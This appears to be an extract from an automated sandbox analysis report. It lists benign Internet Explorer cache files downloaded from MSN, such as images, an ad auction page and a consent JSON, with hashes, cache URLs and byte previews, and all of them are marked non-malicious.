                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1b8vWD[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):13948
                                                                                                                                                                                                                      Entropy (8bit):7.960928547925069
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:xFhdI3iQSCO0VaEiJrRNjfIC3lRpelQVEXGUhI3v3uNP6bs/6fWLt3i0FL1Dt3H/:fvoinS1Olpj3lTq7I3v+16fK7Ddem
                                                                                                                                                                                                                      MD5:FBC6B93083D243383A7C6EF3012BCCE6
                                                                                                                                                                                                                      SHA1:E52F9924F125C8A95C8EF14AF519097E48A88FFA
                                                                                                                                                                                                                      SHA-256:071D12F41593D1CE52F00A2DFF6E88A49425D9E2FAAF2A8F1BC8F4413C022864
                                                                                                                                                                                                                      SHA-512:F666F5C3B244401431A5790D4E2C7F176B0A12D9028CF6066833D104D10D5202CA022AEE34B0AD76454D1CBFF4FB163B3421E1692C9B6E6D677AD3E648A07D0A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8vWD.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...&i.l..Uc..$.9.*..%T.....J...x...j.j...0...u......*.X.^+..e.$..v,:..g...>R.>.c.....M.KW..@....m..>..E.j.Ryw*..u.k..v4:.......`>^.)nGO~.I...-!.:..m5.K.......U......r.l..8S.c.4).be...mk...cU...=F..1..j|Wq...6*...Q...p..w.U..$.L*8.g.hX......^}........e....+.n-....]R5<..'...;..X.fV*.u$.:..+....L......q.J..%.....\.l..Q.C.oq...m0....c...:..h..3#..r..3.X2
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1b91Yy[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):8034
                                                                                                                                                                                                                      Entropy (8bit):7.931775438714074
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:BCZ78sYPEiySThATRuuFsQTrSuxXbFm9lzOyCo:k6rEhiUlquxXZm9lzOy5
                                                                                                                                                                                                                      MD5:1BE70A5E7DA30E34360456CF20EB4501
                                                                                                                                                                                                                      SHA1:C0E554D8D8CDB2E1A61E8391B65EB283D438D62A
                                                                                                                                                                                                                      SHA-256:6046933AFCBB243CF71EF8AEF69170CEA68B8EDCD2516528B258B02880B96C7C
                                                                                                                                                                                                                      SHA-512:C5A9F320B1291FA93B4C5C3C3CAB5675731470CF5BFE8A0BB27851C2504FB0E14AD44FA740CB80CD844771301E4B1C98DAFE993D5C4A0C652CD021B8DCA5535E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b91Yy.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=639&y=234
                                                                                                                                                                                                                      Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..f..a..7.).<..;}B."....F@......v...,..+v............hW;.*3..\..c......F...7e......F.o.p...9.....&.....2c..8.U.C ...(...]5...$........g....[......b. .d.M. c..K..(9lb(u.o.T..\u....[A.,.BEN.,...'.G<{.R.c%.w.K..)..T.V...'&..q.T...VM..@.M.T.DR..4..`q...U....KI.(..Q.(...4P.IKI@.....)(.4.(...}G4..i..qRU)...qBC.2...1....]U...1*.2FI.=..y.+..]<.X...W=i5.;..OVM..1.A.......Y9.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1b95RY[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):16149
                                                                                                                                                                                                                      Entropy (8bit):7.954123255369749
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:eDyatNjpGZmzJlWC/fInkdeAHvNoMHX0Oq+l:eDyatNjgZmlYAwkdLNoc0Ofl
                                                                                                                                                                                                                      MD5:8F7355D622E93E7DDBC08ECB1C94F110
                                                                                                                                                                                                                      SHA1:16E98ABA08C27262976BA9D96A49A6BE0D8B3682
                                                                                                                                                                                                                      SHA-256:E19631572456F949D24DAABA6BB94930AA27DE41BD1022EF31C08E8F80ECED3A
                                                                                                                                                                                                                      SHA-512:B7DB0093BF5F32AFC4F9804B81953B2E79517624E453C6A27A2EB9787EC26AEBABA9940BB65806A7D8A9BF8B4196931CAD9C0558EFCEB75CEE2C7BBD2855B512
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b95RY.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<...qJ...Yhc.m<...l.b.X.... e.s...X....4J.8..I&..).'..u.^;.yP...W..d.R..P.ic...(....2...Q.b."..r...h..."....=)N}.XX.y.R.b.....\.qJ.OA.H........4.T9.A........l...@...5(#.f....J........UF=.XP...S..J..28.....Z..BjE.....ypzS.b3....9..\q.....s.P[..:m..T.V.....n.V...E.lq.b....in4..o&.....w.P1.:.4.....q.u{#h...dm...5"..q.`.c.....g...6\.jz1....Wf..D.7J..........
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1b9kSQ[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):11645
                                                                                                                                                                                                                      Entropy (8bit):7.909563303264489
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:BYEdfQvu/alLksR0p2xI11q0K/2pbm8E1yvdaB8yTLERiYF449nRD1jl7O4BLoD:e24vdp0YIT22mlyVaHLwiYF4AD1VjY
                                                                                                                                                                                                                      MD5:76D7B7A9862299F2114275E314C3CFCD
                                                                                                                                                                                                                      SHA1:E02F81AF5F9CF82E59D364D1B4802E81C648BE06
                                                                                                                                                                                                                      SHA-256:6C2BA92FD3B0888D4D3B1DFB3D672D3424A649863105C9E659C36560AAE19132
                                                                                                                                                                                                                      SHA-512:9A22A17501F77F12734C0436BDE5D031E2F5AA52C80CF4C79897872C680E62BD522AFD87EF00575BE69AD99E0DB5592BDD562E909E17C5C2816267C723EBF601
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9kSQ.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..9...".R..(. ........k.2H.....('....`.Z..={....7~?.........z..x...C@...?...i.....(..._.....hg..E?)=.SO...=..B.......7......L....?t.5^.3...8.M..w.......4.......{.:sN..a....U..+.).....6..k!G.h.IW0q..D...w..LG...'].t.@..&H.8.EM".[d.*.......A.....6..%3.....2...D....o..G....V.<.....".z}..R....d.~cN.drO?1.U.'w...Q......~Q=x......#.7r}.^.....!.=G^O..3%......
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1b9yFR[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):5866
                                                                                                                                                                                                                      Entropy (8bit):7.854671279657883
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:BGqENxLuiVV2aXHBU4HTNduozqKrdBkZ+:Bb2xVVfXXvz3Bp
                                                                                                                                                                                                                      MD5:2F285238564390C56CC6CC1A6D1DDDA5
                                                                                                                                                                                                                      SHA1:2B94CE045944F12A49057BFAE77FE0CA487A7D4B
                                                                                                                                                                                                                      SHA-256:BD357B655938B2D8DFF9803FF88F78BDDD9C87B68CECC4DC113D890715DB403D
                                                                                                                                                                                                                      SHA-512:4A12F42A6C3E169444C5E917EBC71012526489135AAE55B77B1E6E4F3748809DE51CD6F0132E6A72DF296CDC174F3BF48E1FC9891EB7C9E3705D622639E85D5F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9yFR.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1729&y=1568
                                                                                                                                                                                                                      Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....@..+..`.....b.....xZz.Rd..U..T.. J..q".O...F......).j;..1.5h....Xc-./'3>y.U....Nx=....#6Ue$..5j(.......JV.cs:.6#,8.T...8.mGn......n.F.e..U3.h.v.u..S...$.....X:..?.R.%...T}.`}G".-.....>.$V....z..t.\.POl....Q....YO.=?QYw.$NC..`..W{.Q.Av....:..>.1.*PG.........z..p..G?Z.}k...8.k;.*~^..m{..X..0...<.9..)..6.QKHb.E..Z(...(....(...).R.O..[=K..8-8-9V..a.jUZUZx..
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBK9Hzy[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):541
                                                                                                                                                                                                                      Entropy (8bit):7.367354185122177
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/78/W/6T4onImZBfSKTIxS9oXhTDxfIR3N400tf3QHPK5jifFpEPy:U/6rIcBfYxGoxfxfrLqHPKhif7T
                                                                                                                                                                                                                      MD5:4F50C6271B3DF24A75AD8E9822453DA3
                                                                                                                                                                                                                      SHA1:F8987C61D1C2D2EC12D23439802D47D43FED3BDF
                                                                                                                                                                                                                      SHA-256:9AE6A4C5EF55043F07D888AB192D82BB95D38FA54BB3D41F701863239E16E21C
                                                                                                                                                                                                                      SHA-512:AFA483EAFEAF31530487039FB1727B819D4E61E54C395BA9553C721FB83C3B16EDF88E60853387A4920AB8F7DFAD704D1B6D4C12CDC302BE05427FC90E7FACC8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.Q.K[A...M^L../+....`4..x.GAiQb..E<..A.x..'!.P(-..x....`.,...D.)............ov..Yx.`_.4...@._ .r...w.$.H....W...........mj."...IR~f...J..D.|q.......~.<....<.I(t.q.....t...0.....h,.1.......\.1.........m......+.zB..C.....^.u:.....j.o*..j....\../eH.,......}...d-<!t.\.>..X.y.W....evg.Jho..=w*.*Y...n.@.....e.X.z.G.........(4.H...P.L.:".%tls....jq..5....<.)~....x...]u(..o./H.....Hvf....*E.D.).......j/j.=]......Z.<Z....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBiwNf[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):513
                                                                                                                                                                                                                      Entropy (8bit):7.360680406299793
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/7ee/KSISY8njq32rHFT6o47d4/eH+rqEc7:6LYh32rHoo+m/e82
                                                                                                                                                                                                                      MD5:98AA0D4C3552D47E16563B353B0152FC
                                                                                                                                                                                                                      SHA1:D90E356FAA128D0D09CE63A70F10F5FC1AFF584A
                                                                                                                                                                                                                      SHA-256:A7B3C2F1BCD9839CC41289C0D8E7EF28793AAE21B306C25DB2815E35F54D6A3B
                                                                                                                                                                                                                      SHA-512:698B847B11644B4DC672C7B7C14653009CE0A76F84C00144D332F94324E6FBC9D5C7E7EE918C5C4F60A49CCCE4A94F6D26E09A62C9B74D45F5CA287E8A0D0272
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBiwNf.img?m=6&o=true&u=true&n=true&w=30&h=30
                                                                                                                                                                                                                      Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.1K.A...n".4*be.X.6Q$......\oci!X.M.+.O.?`)X).."$.B.$U.. B.o....\..bq...fv.w;.;HHH.WH..+cU......<..._..?b@...S4}...e.....H,;6.>..A .2. .R7.mhk...bCG..?..ak-.%w...C...S.. .U.........-..Q...m,.....z....gc)..Pm.4.i.+..U..n..}'8.j......<j...]..W._.5..1K...4.9V.#..%....q....W.q.u..4L5g.C.s..V.T".4.;L.4.h4...8.......xif;.Yj.G.f..EO.%.t...._..,6.1m.m3.@J.........q.9~v..nL.gf..:5!!./...N.p...w2....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\a5ea21[1].ico
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):758
                                                                                                                                                                                                                      Entropy (8bit):7.432323547387593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                                      MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                                      SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                                      SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                      SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                                                                                                                                                                                      Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\auction[1].htm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):21671
                                                                                                                                                                                                                      Entropy (8bit):5.698275144077281
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:K2jqKHSad3JR0iPe+fIIkj8JPztIXRRQ1zJrZp3mPGvrm5h:K2GjEhPzaAu3
                                                                                                                                                                                                                      MD5:2AC50C4A30DAF207E3C0FC2AAC5862FC
                                                                                                                                                                                                                      SHA1:C890F9E1D25760EF2F1BE9AA82A3DE2275DDEA6E
                                                                                                                                                                                                                      SHA-256:31E200C38D3470F46CE59C203BE68A652DC5D0FA84AC8C1F23593F076F1697EB
                                                                                                                                                                                                                      SHA-512:CF4B591ED09B982FCD9E43CA0B8348E9083E0DACD9EB39DF609A7C3E0A797BB7E41F0550D54ACDC648D3961C74698023E6CD5B3E816C0615AE4E739DE675AF26
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://srtb.msn.com/auction?a=de-ch&b=80907e1b136041569dabba3818b65832&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&_=1605766095820
                                                                                                                                                                                                                      Preview: .<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_9e370761a45b4ccecb4e332de20b610f_8acb2104-78f3-4781-916b-03fc6a910db0-tuct6af9154_1605766100_1605766100_CIi3jgYQr4c_GOa86s3z2Ovo8AEgASgBMCs4stANQL6IEEi0od0DUP___________wFYAGAAaKKcqr2pwqnJjgE&quot;},&quot;tbsessionid&quot;:&quot;v2_9e370761a45b4ccecb4e332de20b610f_8acb2104-78f3-4781-916b-03fc6a910db0-tuct6af9154_1605766100_1605766100_CIi3jgYQr4c_GOa86s3z2Ovo8AEgASgBMCs4stANQL6IEEi0od0DUP___________wFYAGAAaKKcqr2pwqnJjgE&quot;,&quot;pageViewId&quot;:&quot;80907e1b136041569dabba3818b65832&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">.</script>.<li class="head-to-head serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;outbrain&quot;,&quot;e&quot;:true}" data-provider="outbrain" data-ad-region="infopane" data-ad-index="3" data-viewabili
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cfdbd9[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):740
                                                                                                                                                                                                                      Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                      MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                      SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                      SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                      SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\de-ch[1].json
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):74702
                                                                                                                                                                                                                      Entropy (8bit):5.345294167813595
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:hVAyLXfhINb6yvz6Ix1wTpCUVkhB1Ct4AityQ1NEDEEvCDcRiZfWUcU5Jfoc:hVhEvxaEC+biAEv3RiEkz
                                                                                                                                                                                                                      MD5:754F6C92A735B47A2CC5E7D03C2102D1
                                                                                                                                                                                                                      SHA1:71DDB35ED5E57812B895A939C77A0196B538AF40
                                                                                                                                                                                                                      SHA-256:491BF15460B5FEF7B972E48841BACADA7549A01CA52E46297E9F91B2E978132D
                                                                                                                                                                                                                      SHA-512:D3A859DBB25BA28D0401428A6C68B87F0BE3825DAA773B161A86D33164846FF67ADD99FD4A1CF3CA4613293DD2F629C5CE2E9A3E6E8A7C796A361F02CEFA3C68
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                                                                                                                                                      Preview: {"DomainData":{"cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir teilen diese Informationen mit unseren Partnern auf der Grundlage einer Einwilligung und berechtigter Interessen. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAllText":"Einstellungen speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=521839","H
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\e151e5[1].gif
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                      Entropy (8bit):3.122191481864228
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                                      MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                                      SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                                      SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                                      SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                                                                                                                                                                                                                      Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1]
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):4720
                                                                                                                                                                                                                      Entropy (8bit):5.164796203267696
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                                                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                                                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                                                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                                                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:res://ieframe.dll/errorPageStrings.js
